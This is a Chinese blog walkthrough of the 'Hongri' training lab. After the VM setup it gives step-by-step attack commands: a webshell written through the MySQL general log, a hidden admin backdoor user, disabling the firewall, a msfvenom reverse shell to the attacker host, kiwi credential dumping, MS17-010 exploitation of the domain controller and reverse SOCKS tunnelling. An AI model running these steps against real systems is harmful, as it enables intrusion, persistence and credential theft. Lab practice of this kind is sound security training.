红日靶场1

news2025/4/6 18:35:54

文章目录

  • 红日靶场的渗透思路
  • 一、靶场搭建
    • 网络拓扑
    • 1.win7配置
    • 2,win2003配置
    • 3,server2008配置
    • 4,kali配置
  • 二、渗透流程
    • 一.信息收集
    • 二,获取webshell
      • 1.进入后台之后,可以选择插入一句话木马------失败
      • 2.在日志中插入木马
      • 3.蚁剑链接
    • 三,创建后门
      • 1.创建隐藏用户,并加入管理员权限
      • 2.关闭防火墙
    • 四,内网渗透
      • 1.先使用msfvenom,创建木马程序
      • 2.将木马程序通过蚁剑上传到网站上
      • 3.kali通过msfconsole监听
    • 五,内网信息收集
    • 六,提权
    • 七,获取用户密码
    • 八,横向渗透
      • 1.ms17-010漏洞利用
      • 2.添加后门
      • 3.代理内网
      • 4.也可以尝试开代理,使用rdesktop远程连接


红日靶场的渗透思路

活得久爬得高的坏人,往往不会蠢,这是一件让人很无奈的事情


一、靶场搭建

红日靶场下载

网络拓扑

在这里插入图片描述

下载后解压出三个文件夹,分别对应三台靶机,密码都是`hongrisec@2019`,但只有win7可以进
kali(自带)  攻击机

win7         web服务器       

server08     域控

win2003      域成员

在这里插入图片描述

用VMware,打开文件夹中.vmx文件
kali网卡 ---- -----net模式
server2008-----VMware1
win2003---------VMware1
win7--------------两个网卡

1.win7配置

win7是web服务器,连接着外网和内网,所以需要两个网卡
第一个网卡选择------VMwear1(仅主机模式) 用于内网
第二个网卡选择------net模式 用于外网

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

使用hongrisec@2019登陆后,打开phpstudy中,apache和MySQL服务

在这里插入图片描述

2,win2003配置

在这里插入图片描述

3,server2008配置

在这里插入图片描述

4,kali配置

在这里插入图片描述

二、渗透流程

一.信息收集

C段扫描

在这里插入图片描述

端口扫描

在这里插入图片描述

目录扫描

在这里插入图片描述在这里插入图片描述

扫出三个有效的目录
 /phpmyadmin
 /phpinfo.php
 /l.php

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

1.从这三个目录中可以得到php的版本5.4.45
2.网站的绝对路径是C:/phpStudy/WWW
3.phpmyadmin是后台,可以尝试弱密码爆破(账号密码都是root

二,获取webshell

1.进入后台之后,可以选择插入一句话木马------失败

在这里插入图片描述

报错提示,要使用into outfile函数,secure_file_priv函数要为ON
且不能被set global修改,只能在my.ini或my.conf配置文件中修改

在这里插入图片描述

在这里插入图片描述

2.在日志中插入木马

查看日志的状态
show variables like ‘%general%’;

在这里插入图片描述

修改日志状态
set global general_log=‘ON’; 执行再次查看日志状态

在这里插入图片描述

成功修改后,将日志转移到网站根目录下
set global general_log_file=‘C:/phpStudy/WWW/lzh.php’;
lzh.php是自己随便命名的

在这里插入图片描述

然后加入一句话木马
select ‘<?php @eval($_POST[c]);?>’

在这里插入图片描述
在这里插入图片描述

3.蚁剑链接

在这里插入图片描述
在这里插入图片描述

三,创建后门

1.创建隐藏用户,并加入管理员权限

net user lzh$ 123456lzh@ /add     创建隐藏用户
net localgroup administrators lzh$ /add     将用户加入管理员组
net user lzh$ /active:yes           激活用户

在这里插入图片描述

2.关闭防火墙

netsh advfirewall show allprofile state   查看防火墙状态
netsh advfirewall set allprofile state off   关闭防火墙

在这里插入图片描述在这里插入图片描述

whoami查看还是administrator权限

四,内网渗透

1.先使用msfvenom,创建木马程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.32.128 LPORT=6666 -f exe -o hacker.exe

2.将木马程序通过蚁剑上传到网站上

在这里插入图片描述

3.kali通过msfconsole监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.32.128
set lport 6666
run

在这里插入图片描述

运行hacker.exe

在这里插入图片描述

五,内网信息收集

shell
chcp 65001 修复乱码

在这里插入图片描述

ipconfig /all
显示所有网络适配器
主机名为stu1,内网网段为192.168.52.143

在这里插入图片描述在这里插入图片描述

net user /domain
查看域用户
域内有5个用户

在这里插入图片描述

net group “domain admins” /domain ------查看域管理员

在这里插入图片描述

net config workstation ---------查看当前的域的信息

在这里插入图片描述

net time /domain ----------查找域控

得到域名,通过ping,解析域名的IP地址
192.168.52.138

在这里插入图片描述

net view /domain ---------查看本机的域

这里是引用

net view ---------查看当前域中计算机的名称

在这里插入图片描述
在这里插入图片描述

经过以上内网信息收集,得到
域内有3台主机,
//OWA, 域控:192.168.52.138
//ROOT-TVI862UBEH,域成员:192.168.52.141
//STU1win7:192.168.52.143
域内有5个用户
Administrator | Guest | krbtgt | ligang | liukaifeng01

六,提权

1| getuid    查看当前权限
2| getsystem   提权
3| getuid    验证提权

在这里插入图片描述

七,获取用户密码

在这里插入图片描述

我们可以看到使用kiwi模块,爆不出密码,是因为kiwi默认是32位的系统,而win7是64位的系统,不兼容,所以我们需要将meterpreter模块迁移到64位的进程中
1.首先ps查看进程
2.找一个user为system的进程----PID
3.migrate 508
4.load kiwi 加载kiwi模块
5.creds_all 这里密码我自己改过

在这里插入图片描述
在这里插入图片描述

八,横向渗透


> 使用autoroute模块,它的功能是添加去内网路由
> run post/multi/manage/autoroute    查看当前路由信息
> run autoroute -s 192.168.10.0/24        添加路由
> run autoroute -p                    查看路由信息

background相当于存档,使用session -i,可以回到存档时的位置

在这里插入图片描述

路由添加完成之后,就是扫描内网主机的端口
search portscan
use auxiliary/scanner/portscan/tcp
set rhosts 192.168.52.141             添加目标主机的IP地址
set ports 22,445,3389                 添加要扫描的端口,可以更多
run

在这里插入图片描述

1.ms17-010漏洞利用

发现两台主机都开放了,445端口,想到用永恒之蓝试一下

在这里插入图片描述

可以看到两台主机都有永恒之蓝的漏洞
使用模块command

2.添加后门

添加用户
use 2
set rhosts 192.168.52.138
set command net user hacker 123456hack! /add
run

将用户添加到管理员组
set command net localgroup Administrators hacker /add
run

开启远程桌面
set command ‘REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f’
run

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

3.代理内网

ew(Earthworm)内网穿透工具

git clone https://github.com/idlefire/ew.git

kali

./ew_for_linux64 -s rcsocks -l 5656 -e 9999

在这里插入图片描述meterpreter

ew_for_Win.exe -s rssocks -d 192.168.32.128 -e 9999

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

开全局代理:setg proxies socks5:127.0.0.1:5656

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

这里不知道为什么会报错,也查了资料,一无所获,就放弃了,

4.也可以尝试开代理,使用rdesktop远程连接

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1381682.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

odoo14 动态改变进度条颜色(widget=“progressbar“)底色,边框,进度颜色

在odoo14中当时使用&#xff1a;widget"progressbar" 时默认表现为&#xff1a; 但我想在不同的比例展示不同的颜色&#xff0c;和其他的样式颜色&#xff1a; tree视图 form视图 也一样&#xff1a; 说明&#xff1a;进度0-30为蓝色&#xff0c;31-80为黄色&…

【C++ 程序设计入门基础】- 第4节-函数

1、函数 函数是对实现某一功能的代码的模块化封装。 函数的定义&#xff1a; 标准函数&#xff1a; 输入 n 对整数的 a、b &#xff0c;输出它们的和。 #include <iostream> #include <windows.h> using namespace std;int add(int a,int b);//函数原型声明int…

PyCharm连接服务器 - 2

文章目录 PyCharm连接服务器-21.如何连接服务器&#xff1f;2.如何在终端窗口打开SSH连接&#xff1f;3.Terminal终端出现中文乱码的解决办法&#xff1f;4.如何查看远程服务器的树目录结构&#xff1f;5.如何配置代码同步&#xff1f;6.如何为项目配置远程服务器中的python解释…

C#进阶学习

目录 简单数据结构类ArrayList声明增删查改遍历装箱拆箱 Stack声明增取查改遍历装箱拆箱 Queue声明增取查改遍历 Hashtable声明增删查改遍历装箱拆箱 泛型泛型分类泛型的作用泛型约束 常用泛型数据结构类List声明增删查改遍历 Dictionary声明增删查改遍历 LinkedList声明增删查…

05.neuvector网络学习与管控实现

原文链接&#xff0c;欢迎大家关注我的github 一、网络的策略学习 1.1.非主机模式的网络连接学习 agent进程侧&#xff1a; 调用taskAddContainer->taskInterceptContainer->programDP->DPCtrlAddTapPort为所有非host模式的容器向dp传送 DPAddTapPortReq对象数据.&…

OpenGL 网格拾取坐标(Qt)

文章目录 一、简介二、代码实现三、实现效果参考资料一、简介 有时候我们希望通过鼠标来拾取某个网格中的坐标,这就涉及到一个很有趣的场景:光线投射,也就是求取一条射线与网格的交点,这里如果我们采用普通遍历网格中的每个面片的方式,当网格的面片数据量很大时计算效率就…

版本控制神器之Git深入介绍

Git简介 Git&#xff08;全局信息追踪器&#xff09;。 Git是一个分布式版本控制工具&#xff0c;Git的使用中央仓库不是必须的&#xff0c;用户本地就是一个完整的版本仓库&#xff0c;代码的前进、回退、删除等等操作都可以直接在本地进行&#xff0c;不需要中央仓库。但是…

Java多线程:初识多线程!左手画方,右手画圆

&#x1f451;专栏内容&#xff1a;Java⛪个人主页&#xff1a;子夜的星的主页&#x1f495;座右铭&#xff1a;前路未远&#xff0c;步履不停 目录 一、线程与进程二、创建线程方法1、继承Thread类2、实现Runnable接口3、两者区别4、举个栗子5、简洁写法Ⅰ、Thread匿名内部类写…

vue开发H5 实现滑动图片获取验证码

<template><div><van-button type"primary" click"sendVerification">获取验证码</van-button><van-popupv-model"captchaVisible"closeableposition"bottom"class"login-captcha":close-on-cli…

基于JAVA+SSM框架开发的志愿者服务管理系统设计与实现【附源码】

&#x1f345; 作者主页 央顺技术团队 &#x1f345; 欢迎点赞 &#x1f44d; 收藏 ⭐留言 &#x1f4dd; &#x1f345; 文末获取源码联系方式 &#x1f4dd; &#x1f345; 查看下方微信号获取联系方式 承接各种定制系统 &#x1f4dd; &#x1f680;&#x1f680;&#x1f6…

强化学习(一)简介

强化学习这一概念在历史上来源于行为心理学&#xff0c;来描述生物为了趋利避害而改变自己行为的学习过程。人类学习的过程其实就是为达到某种目的不断地与环境进行互动试错&#xff0c;比如婴儿学习走路。强化学习算法探索了一种从交互中学习的计算方法。 1、强化学习 强化学…

31 树的存储结构一

无法直接用数组表示树的逻辑结构&#xff0c;但是可以设计结构体数组对节点间的关系进行描述&#xff1a;【如表】 这样做的问题&#xff1a; 可以利用 组织链表 parent指针&#xff1a; 注意&#xff1a;树结点在 组织链表 中的位置不代表树的任何逻辑关系 树的架构图&#xf…

DNS 在互联网中的作用是什么?

互联网的运作离不开DNS&#xff0c;那么DNS到底是什么&#xff1f;它在互联网中发挥着怎样的作用呢&#xff1f; DNS&#xff0c;全称为Domain Name System&#xff0c;即域名系统&#xff0c;是互联网的一项基础设施。它负责将人们易于记忆的域名&#xff08;如www.example.…

MySQL 从零开始:06 数据检索

文章目录 1、数据准备2、限制结果3、完全限定名4、排序检索 所谓数据检索&#xff0c;就是前面所讲的”增删改查“的”查“。 注&#xff1a;本文使用的“行”指数据表中的“记录”&#xff0c;“列”指数据表中的“字段”。 在第四节《表的增删改查》中已经介绍了 select 查询…

C# Cad2016二次开发api(三)

直线 Line 属性中文数据类型作用Length长度double直线的长度Angle角度double直线的弧度&#xff0c;0~2πDelta增量Vector3d起点到终点的向量Normal法向向量Vector3d直线所在平面的法向单位向量Thickness厚度doubleEndPoint终点Point3d直线的终点StartPoint起点Point3d直线的起…

Memory Wall in Neural Network Inference

Memory Wall in Neural Network Inference 神经网络推理的瓶颈在于访存带宽&#xff0c;通常无法发挥出加速器的全部算力。本文总结了目前常用的推理加速器及其设计&#xff0c;并分析了常用神经网络的访存瓶颈。文章大部分内容参考自Computer Architecture: A Quantitative A…

JavaScript基础(26)_dom增删改练习

<!DOCTYPE html> <html lang"zh"><head><meta charset"UTF-8"><title>DOM增删改练习</title><link rel"stylesheet" href"../browser_default_style/reset.css"><style>table {borde…

软件测试|Selenium StaleElementException异常的原因与方法

简介 在使用Selenium进行Web自动化测试时&#xff0c;我们可能会遇到StaleElementException异常。这个异常通常在我们操作一个之前已经找到的元素时抛出&#xff0c;但该元素已经不再处于DOM树中&#xff0c;导致元素过时&#xff08;stale&#xff09;。本文将介绍StaleEleme…

C++11 左右值引用、移动语义

右值引用和移动语义 什么是左值&#xff1f;什么是左值引用&#xff1f; 左值是一个表示数据的表达式(如变量名或解引用的指针)&#xff0c;我们可以获取它的地址可以对它赋值&#xff0c;左值可以出现赋值符号的左边&#xff0c;右值不能出现在赋值符号左边。定义时const修饰…

SpringSecurity入门demo(二)表单认证

上一篇博客集成 Spring Security&#xff0c;使用其默认生效的 HTTP 基本认证保护 URL 资源&#xff0c;下面使用表单认证来保护 URL 资源。 一、默认表单认证&#xff1a; 代码改动&#xff1a;自定义WebSecurityConfig配置类 package com.security.demo.config; import or…